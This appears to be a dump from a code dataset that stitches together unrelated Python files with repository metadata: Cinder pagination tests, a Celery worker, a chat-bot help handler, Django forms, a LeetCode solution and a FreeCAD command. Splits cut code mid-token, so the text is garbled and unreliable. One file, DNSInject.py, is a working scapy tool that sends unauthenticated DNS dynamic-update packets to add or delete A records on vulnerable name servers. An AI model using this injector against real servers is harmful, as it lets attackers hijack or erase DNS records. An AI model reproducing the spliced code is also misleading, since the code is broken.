self.assertEqual([], common.limited(self.tiny, req))
self.assertEqual([], common.limited(self.small, req))
self.assertEqual([], common.limited(self.medium, req))
self.assertEqual(
common.limited(self.large, req), self.large[1001:2001])
def test_limiter_offset_blank(self):
"""Test offset key works with a blank offset."""
req = webob.Request.blank('/?offset=')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
def test_limiter_offset_bad(self):
"""Test offset key works with a BAD offset."""
req = webob.Request.blank(u'/?offset=\u0020aa')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
def test_limiter_nothing(self):
"""Test request with no offset or limit."""
req = webob.Request.blank('/')
self.assertEqual(common.limited(self.tiny, req), self.tiny)
self.assertEqual(common.limited(self.small, req), self.small)
self.assertEqual(common.limited(self.medium, req), self.medium)
self.assertEqual(common.limited(self.large, req), self.large[:1000])
def test_limiter_limit_zero(self):
"""Test limit of zero."""
req = webob.Request.blank('/?limit=0')
self.assertEqual(common.limited(self.tiny, req), self.tiny)
self.assertEqual(common.limited(self.small, req), self.small)
self.assertEqual(common.limited(self.medium, req), self.medium)
self.assertEqual(common.limited(self.large, req), self.large[:1000])
def test_limiter_limit_bad(self):
"""Test with a bad limit."""
req = webob.Request.blank(u'/?limit=hello')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
def test_limiter_limit_medium(self):
"""Test limit of 10."""
req = webob.Request.blank('/?limit=10')
self.assertEqual(common.limited(self.tiny, req), self.tiny)
self.assertEqual(common.limited(self.small, req), self.small)
self.assertEqual(common.limited(self.medium, req), self.medium[:10])
self.assertEqual(common.limited(self.large, req), self.large[:10])
def test_limiter_limit_over_max(self):
"""Test limit of 3000."""
req = webob.Request.blank('/?limit=3000')
self.assertEqual(common.limited(self.tiny, req), self.tiny)
self.assertEqual(common.limited(self.small, req), self.small)
self.assertEqual(common.limited(self.medium, req), self.medium)
self.assertEqual(common.limited(self.large, req), self.large[:1000])
def test_limiter_limit_and_offset(self):
"""Test request with both limit and offset."""
items = range(2000)
req = webob.Request.blank('/?offset=1&limit=3')
self.assertEqual(common.limited(items, req), items[1:4])
req = webob.Request.blank('/?offset=3&limit=0')
self.assertEqual(common.limited(items, req), items[3:1003])
req = webob.Request.blank('/?offset=3&limit=1500')
self.assertEqual(common.limited(items, req), items[3:1003])
req = webob.Request.blank('/?offset=3000&limit=10')
self.assertEqual(common.limited(items, req), [])
def test_limiter_custom_max_limit(self):
"""Test a max_limit other than 1000."""
items = range(2000)
req = webob.Request.blank('/?offset=1&limit=3')
self.assertEqual(
common.limited(items, req, max_limit=2000), items[1:4])
req = webob.Request.blank('/?offset=3&limit=0')
self.assertEqual(
common.limited(items, req, max_limit=2000), items[3:])
req = webob.Request.blank('/?offset=3&limit=2500')
self.assertEqual(
common.limited(items, req, max_limit=2000), items[3:])
req = webob.Request.blank('/?offset=3000&limit=10')
self.assertEqual(common.limited(items, req, max_limit=2000), [])
def test_limiter_negative_limit(self):
"""Test a negative limit."""
req = webob.Request.blank('/?limit=-3000')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
def test_limiter_negative_offset(self):
"""Test a negative offset."""
req = webob.Request.blank('/?offset=-30')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
class PaginationParamsTest(test.TestCase):
"""Unit tests for `cinder.api.common.get_pagination_params` method.
This method takes in a request object and returns 'marker' and 'limit'
GET params.
"""
def test_nonnumerical_limit(self):
"""Test nonnumerical limit param."""
req = webob.Request.blank('/?limit=hello')
self.assertRaises(
webob.exc.HTTPBadRequest, common.get_pagination_params, req)
def test_no_params(self):
"""Test no params."""
req = webob.Request.blank('/')
self.assertEqual({}, common.get_pagination_params(req))
def test_valid_marker(self):
"""Test valid marker param."""
req = webob.Request.blank(
'/?marker=263abb28-1de6-412f-b00b-f0ee0c4333c2')
self.assertEqual({'marker': '263abb28-1de6-412f-b00b-f0ee0c4333c2'},
common.get_pagination_params(req))
def test_valid_limit(self):
"""Test valid limit param."""
req = webob.Request.blank('/?limit=10')
self.assertEqual({'limit': 10}, common.get_pagination_params(req))
def test_invalid_limit(self):
"""Test invalid limit param."""
req = webob.Request.blank('/?limit=-2')
self.assertRaises(
webob.
|
EthanGuo/regular-ticket-task
|
worker.py
|
Python
|
mit
| 325
| 0.003077
|
# -*-coding: utf-8-*-
from
|
celery import Celery
from op import utils
import celeryconfig
worker = Celery('Regular-Ticket-Task')
worker.config_from_object(celeryconfig)
worker.conf.BROKER_URL = utils.get_config('celery', 'BROKER_URL')
worker.conf.CELERY_RESULT_BACKEND = utils.get_config('celery', 'CELERY_RE
|
SULT_BACKEND')
|
TLemur/freq-bot
|
src/plugins/help/help_handler.py
|
Python
|
gpl-3.0
| 2,586
| 0.023975
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
#~#######################################################################
#~ Copyright (c) 2008 Burdakov Daniel <kreved@kreved.org> #
#~ #
#~ This file is part of FreQ-bot. #
#~ #
#~ FreQ-bot is free software: you can redistribute it and/or modify #
#~ it under the terms of the GNU General Public License as published by #
#~ the Free Software Foundation, either version 3 of the License, or #
#~ (at your option) any later version. #
#~ #
#~ FreQ-bot is distributed in the hope that it will be useful, #
#~ but WITHOUT ANY WARRANTY; without even the implied warranty of #
#~ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
#~ GNU General Public License for more details. #
#~ #
#~ You should have received a copy of the GNU General Public License #
#~ along with FreQ-bot. If not, see <http://www.gnu.org/licenses/>. #
#~#######################################################################
def help_handler(t, s, p):
p = p.strip()
q = re.search('^(\-..\ )?\.?(.+)$', p)
if q:
rlang = q.groups()[0]
if rlang: rlang = rlang[1:3]
else: rlang = lang.getLang(s.jid)
p = q.groups()[1]
if p.startswith('.'): p = p[1:]
else:
rlang = lang.getLang(s.jid)
p = ''
if p:
if p.startswith('.'): p = p[1:]
if p in HELP_CATEGORIES:
answer = HELP_CATEGORIES[p]
answer.sort()
answer = ', '.join(answer)
s.lmsg(t, 'help_category', answer)
else:
if p in HELP_LANGS:
q = HELP_LANGS[p]
if rlang in q:
content = loa
|
d_help_content(p, rlang)
categories = ', '.join([w fo
|
r w in HELP_CATEGORIES.keys() if p in HELP_CATEGORIES[w]])
s.lmsg(t, 'help_show', categories, content)
else:
languages = HELP_LANGS[p]
languages = ["'.help -%s %s'" % (w, p) for w in languages]
s.lmsg(t, 'help_other_languages', p, rlang, ', '.join(languages))
else: s.lmsg(t, 'help_not_found', p)
else:
ans = ['%s(%s)' % (w, len(HELP_CATEGORIES[w])) for w in HELP_CATEGORIES.keys()]
ans.sort()
categories = ', '.join(ans)
s.lmsg(t, 'help_categories', categories)
bot.register_cmd_handler(help_handler, '.help')
bot.register_cmd_handler(help_handler, 'help')
|
ChrisTruncer/PenTestScripts
|
HostScripts/DNSInject.py
|
Python
|
gpl-3.0
| 4,615
| 0.002384
|
#!/usr/bin/env python
# by Chris Truncer
# Script to attempt to forge a packet that will inject a new value
# for a dns record. Check nessus plugin #35372
# Some great documentation and sample code came from:
# http://bb.secdev.org/scapy/src/46e0b3e619547631d704c133a0247cf4683c0784/scapy/layers/dns.py
import argparse
import logging
# I know it's bad practice to add code up here, but it's the only way I could
# see to suppress the IPv6 warning from scapy (By setting this
# before importing scapy).
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import os
from scapy.all import IP, UDP, DNS, DNSQR, DNSRR, sr1
import sys
def add_a_record(name_server, new_dns_record, ip_value):
os.system('clear')
title()
# Verifying all required options have a populated value
if name_server is None or new_dns_record is None or ip_value is None:
print "[*] ERROR: You did not provide all the required command line options!"
print "[*] ERROR: Please re-run with required options."
sys.exit()
print "[*] Crafting packet for record injection..."
print "[*] Sending DNS packet adding " + new_dns_record
print "[*] and pointing it to " + ip_value + "\n"
dns_zone = new_dns_record[new_dns_record.find(".")+1:]
# Craft the packet with scapy
add
|
_packet = sr1(IP(dst=name_server)/UDP()/DNS(
opcode=5,
qd=[DNSQR(qname=dns_zone, qtype="SOA")],
ns=[DNSRR(rrname=new_dns_record,
type="A", ttl=120, rdata=ip_value)]))
print add_packet[DNS].summary()
print "\n[*] Packet created and sent!"
def cli_parser():
# Command line argument parser
parser = argparse.ArgumentParser(
add_help=False,
description="DNSInject is a tool for modifying DNS records on vulnerable servers.")
parser.a
|
dd_argument(
"--add", action='store_true',
help="Add \"A\" record to the vulnerable name server.")
parser.add_argument(
"--delete", action='store_true',
help="Delete \"A\" record from the vulnerable name server.")
parser.add_argument(
"-ns", metavar="ns1.test.com",
help="Nameserver to execute the specified action.")
parser.add_argument(
"-d", metavar="mynewarecord.test.com",
help="Domain name to create an A record for.")
parser.add_argument(
"-ip", metavar="192.168.1.1",
help="IP Address the new record will point to.")
parser.add_argument(
'-h', '-?', '--h', '-help', '--help', action="store_true",
help=argparse.SUPPRESS)
args = parser.parse_args()
if args.h:
parser.print_help()
sys.exit()
return args.add, args.delete, args.ns, args.d, args.ip
def delete_dns_record(del_ns, del_record):
os.system('clear')
title()
# Verifying all required options have a populated value
if del_ns is None or del_record is None:
print "[*] ERROR: You did not provide all the required command line options!"
print "[*] ERROR: Please re-run with required options."
sys.exit()
print "[*] Crafting packet for record deletion..."
print "[*] Sending packet which deletes the following record: "
print "[*] " + del_record + "\n"
dns_zone = del_record[del_record.find(".")+1:]
del_packet = sr1(IP(dst=del_ns)/UDP()/DNS(
opcode=5,
qd=[DNSQR(qname=dns_zone, qtype="SOA")],
ns=[DNSRR(rrname=del_record, type="ALL",
rclass="ANY", ttl=0, rdata="")]))
print del_packet[DNS].summary()
print "\n[*] Packet created and sent!"
def title():
print "######################################################################"
print "# DNS Injector #"
print "######################################################################\n"
return
if __name__ == '__main__':
# Parse command line arguments
action_add, action_delete, dns_nameserver, dns_record, dns_ip = cli_parser()
#Chose function based on action variable value
try:
if action_add:
add_a_record(dns_nameserver, dns_record, dns_ip)
elif action_delete:
delete_dns_record(dns_nameserver, dns_record)
else:
print "[*] ERROR: You didn't provide a valid action."
print "[*] ERROR: Restart and provide your desired action!"
sys.exit()
except AttributeError:
os.system('clear')
title()
print "[*] ERROR: You didn't provide a valid action."
print "[*] ERROR: Restart and provide your desired action!"
|
mateusportal/portalconta
|
empresas/forms.py
|
Python
|
gpl-2.0
| 537
| 0.007449
|
from django import forms
from empresas.models import Usuario, Pessoa, Empresa
class LoginForm(forms.Form):
username = forms.CharField(max_length='200', required=True)
password = forms.CharField(widget=forms.PasswordInput, required=True)
class UsuarioForm(forms.ModelForm):
password = forms.
|
CharField(widget=forms.PasswordInput)
class Meta:
model = Usuario
class PessoaForm(forms.ModelForm):
class Meta:
model = Pessoa
class EmpresaForm(forms.ModelForm):
cl
|
ass Meta:
model = Empresa
|
JulyKikuAkita/PythonPrac
|
cs15211/ConvertANumberToHexadecimal.py
|
Python
|
apache-2.0
| 4,592
| 0.004138
|
__source__ = ''
# https://github.com/kamyu104/LeetCode/blob/master/Python/convert-a-number-to-hexadecimal.py
# Time: O(logn)
# Space: O(1)
#
# Description:
#
# Given an integer, write an algorithm to convert it to hexadecimal.
# For negative integer, two's complement method is used.
#
# IMPORTANT:
# You must not use any method provided by the library which converts/formats
# the number to hex directly. Such solution will result in disqualification of
# all your submissions to this problem. Users may report such solutions after the
# contest ends and we reserve the right of final decision and interpretation
# in the case of reported solutions.
#
# Note:
#
# All letters in hexadecimal (a-f) must be in lowercase.
# The hexadecimal string must not contain extra leading 0s. If the number is zero,
# it is represented by a single zero character '0'; otherwise,
# the first character in the hexadecimal string will not be the zero character.
# The given number is guaranteed to fit within the range of a 32-bit signed integer.
# You must not use any method provided by the library which converts/formats the number to hex directly.
# Example 1:
#
# Input:
# 26
#
# Output:
# "1a"
# Example 2:
#
# Input:
# -1
#
# Output:
# "ffffffff"
# Bit Manipulation
import unittest
# 20ms 98.60%
class Solution(object):
def toHex(self, num):
return ''.join('0123456789abcdef'[(num >> 4 * i) & 15]
for i in range(8)
)[::-1].lstrip('0') or '0'
def toHex2(self, num):
"""
:type num: int
:rtype: str
"""
if not num:
return "0"
res = []
while num and len(res) != 8:
h = num & 15
if h < 10:
res.append(str(chr(ord('0') + h)))
else:
res.append(str(chr(ord('a') + h - 10)))
num >>= 4
res.reverse()
return "".join(res)
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
if __name__ == '__main__':
unittest.main()
Java = '''
# https://ratchapong.com/algorithm-practice/leetcode/convert-a-number-to-hexadecimal
# Thought: each time we take a look at the last four digits of
binary verion of the input, and maps that to a hex char
shift the input to the right by 4 bits, do it again
until input becomes 0.
# 3ms 100%
class Solution {
public String toHex(int num) {
if (num == 0) return "0";
char[] map = new char[]{'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f'};
StringBuilder sb = new StringBuilder();
while (num != 0) {
sb.insert(0, map[num & 0b1111]);
num = num >>> 4;
}
return sb.toString();
}
}
Worst Case
O(logb(n)) : With respect to the input, the algorithm will always depend on the size of input.
The extra space is needed to store the equivalent string of base 16
Approach: Shifting and Masking
Number is masked against binary of 1111 each time to get the component value
which is then mapped to corresponding character. >>> is used to right-shifted
4
4 bit positions with zero-extension. The zero-extension will na
|
turally deal with negative number.
StringBuilder is used due to its efficiently in inserting character to existing StringBuilder object.
If normal St
|
ring is used then each insertion by + operation
will have to copy over the immutable String object which is highly inefficient.
For Integer.MAX_VALUE or Integer.MIN_VALUE or any input
with 8 Hexadecimal characters where the iterations would last the longest.
For Integer.MAX_VALUE the algorithm will run for at most log base16 (2^31 - 1) +1 = 8 times
# 3ms 100%
class Solution {
public String toHex(int num) {
long n = num & 0x00000000ffffffffL;
char[] map = new char[]{'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f'};
StringBuilder sb = new StringBuilder();
while (n > 0) {
sb.insert(0, map[(int) (n % 16)]);
n = n / 16;
}
return num == 0 ? "0" : sb.toString();
}
}
Worst Case
O(logb(n)) : With respect to the input, the algorithm will always depend on the size of input.
The extra space is needed to store the equivalent string of base 16.
Approach: Divide and Modding
To deal with negative number, the number is masked against long data type.
This process will convert it to a positive long number.
A simple while loop is then use to extract each base digit until number becomes 0.
'''
|
bblacey/FreeCAD-MacOS-CI
|
src/Mod/Fem/PyGui/_CommandFemMeshNetgenFromShape.py
|
Python
|
lgpl-2.1
| 3,519
| 0.002273
|
# ***************************************************************************
# * *
# * Copyright (c) 2013-2015 - Juergen Riegel <FreeCAD@juergen-riegel.net> *
# * *
# * This program is free software; you can redistribute it and/or modify *
# * it under the terms of the GNU Lesser General Public License (LGPL) *
# * as published by the Free Software Foundation; either version 2 of *
# * the License, or (at your option) any later version. *
# * for detail see the LICENCE text file. *
# * *
# * This program is distributed in the hope that it will be useful, *
# * but WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
# * GNU Library General Public License for more details. *
# * *
# * You should have received a copy of the GNU Library General Public *
# * License along with this program; if not, write to the Free Software *
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
# * USA *
# * *
# ***************************************************************************
__title__ = "Command Mesh Netgen From Shape"
__author__ = "Juergen Riegel"
__url__ = "http://www.freecadweb.org"
## @package CommandFemMeshNetgenFromShape
# \ingroup FEM
import FreeCAD
from FemCommands import FemCommands
import FreeCADGui
import FemGui
from PySide import QtCore
class _CommandFemMeshNetgenFromShape(FemCommands):
# the FEM_MeshNetgenFromShape command definition
def __init__(self):
|
super(_CommandFemMeshNetgenFromShape, self).__init__()
self.resources = {'Pixmap': 'fem-femmesh-netgen-from-shape',
'MenuText': QtCore.QT_TRANSLATE_NOOP("FEM_MeshFromShape", "FEM mesh from shape by Netgen"),
'ToolTip': QtCore.QT_TRANSLATE_NOOP("FEM_MeshFromShape", "Create a FEM volume mesh from a solid or face shape by Netgen internal mesher")}
self.is
|
_active = 'with_part_feature'
def Activated(self):
FreeCAD.ActiveDocument.openTransaction("Create FEM mesh Netgen")
FreeCADGui.addModule("FemGui")
sel = FreeCADGui.Selection.getSelection()
if (len(sel) == 1):
if(sel[0].isDerivedFrom("Part::Feature")):
FreeCADGui.doCommand("App.activeDocument().addObject('Fem::FemMeshShapeNetgenObject', '" + sel[0].Name + "_Mesh')")
FreeCADGui.doCommand("App.activeDocument().ActiveObject.Shape = App.activeDocument()." + sel[0].Name)
if FemGui.getActiveAnalysis():
FreeCADGui.addModule("FemGui")
FreeCADGui.doCommand("FemGui.getActiveAnalysis().Member = FemGui.getActiveAnalysis().Member + [App.ActiveDocument.ActiveObject]")
FreeCADGui.doCommand("Gui.activeDocument().setEdit(App.ActiveDocument.ActiveObject.Name)")
FreeCADGui.Selection.clearSelection()
FreeCADGui.addCommand('FEM_MeshNetgenFromShape', _CommandFemMeshNetgenFromShape())
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.